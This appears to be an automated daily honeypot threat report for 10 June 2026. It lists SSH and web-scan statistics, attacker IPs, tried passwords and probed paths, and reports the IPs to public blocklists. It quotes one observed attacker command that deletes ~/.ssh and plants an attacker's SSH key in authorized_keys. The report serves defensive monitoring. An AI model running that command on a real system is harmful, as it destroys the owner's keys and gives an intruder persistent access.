Wednesday, 10 June 2026 πŸ’€ critical

Daily Threat Report

164 SSH Connections
136 Login Attempts
281 Commands Run
41 SSH Unique IPs
300 Protocol Events
27 Protocol IPs
63 Web Hits
24 Web Service IPs

Top Attacker IPs

  1. 🌐 176.65.139.41 BGPβ†—
  2. 🌐 87.251.64.176 BGPβ†—
  3. 🌐 80.70.96.139 BGPβ†—
  4. 🌐 185.246.128.133 BGPβ†—
  5. 🌐 35.195.84.252 BGPβ†—

Top Passwords Tried

  1. 91566946b1d8deb0
  2. aad3f9ba1d6740cc
  3. 6e86f2270ed47801
  4. 6460662e217c7a9f
  5. ebf20cefc9169e0b

🌐 WEB HONEYPOT β€” HoneyAI HTTP

AI-generated fake HTTP responses served to 63 scanner requests from 24 unique IPs (local, offline).

Top Paths Probed

  1. /
  2. /SDK/webLanguage
  3. /login
  4. /.env
  5. /.env.local

Top User-Agents

  1. Mozilla/5.0
  2. Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
  3. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
  4. visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
  5. Mozilla/5.0 (compatible; Infrawatch/1.0; +https://infrawat.ch/)
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
β†’ 118 IPs β†’ AbuseIPDB  (community confidence scores updated)
β†’ 118 IPs β†’ AlienVault OTX  (pulse indicators added)
β†’ 118 IPs β†’ Blocklist.de  (auto-ban list updated)
β†’ 118 IPs β†’ DShield/SANS  (global threat feed updated)

🀣 ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

πŸ”‘ Hall of Shame β€” Passwords

91566946b1d8deb0
aad3f9ba1d6740cc
6e86f2270ed47801
6460662e217c7a9f
ebf20cefc9169e0b

πŸ’» Commands They Tried

cd ~ && rm -rf .ssh && mkdir .ssh && echo $_dqssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr$_dq>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 10 de June de 2026. Recorded 164 SSH connections on the Cowrie honeypot and 300 multi-protocol events on OpenCanary, from 68 unique IPs. 118 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (Cowrie)

The SSH honeypot received 136 login attempts from 41 unique IPs. Attackers executed 281 commands after gaining simulated system access.

Multi-Protocol Activity (OpenCanary)

Detected 300 events across services including FTP, Telnet, MySQL, Redis, VNC and Git from 27 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 63 HTTP requests from real scanners across 24 unique IPs. Each attacker received a fake response generated in real time by the local AI model qwen2.5:0.5b (Ollama, no internet connection required).

Network IDS (Suricata)

The network intrusion detection system generated 16721 alerts from 1356 unique source IPs. Suricata monitors all traffic on the primary network interface using Emerging Threats + AlienVault OTX rulesets.

← All Reports πŸ›‘οΈ Subscribe to blocklists β†’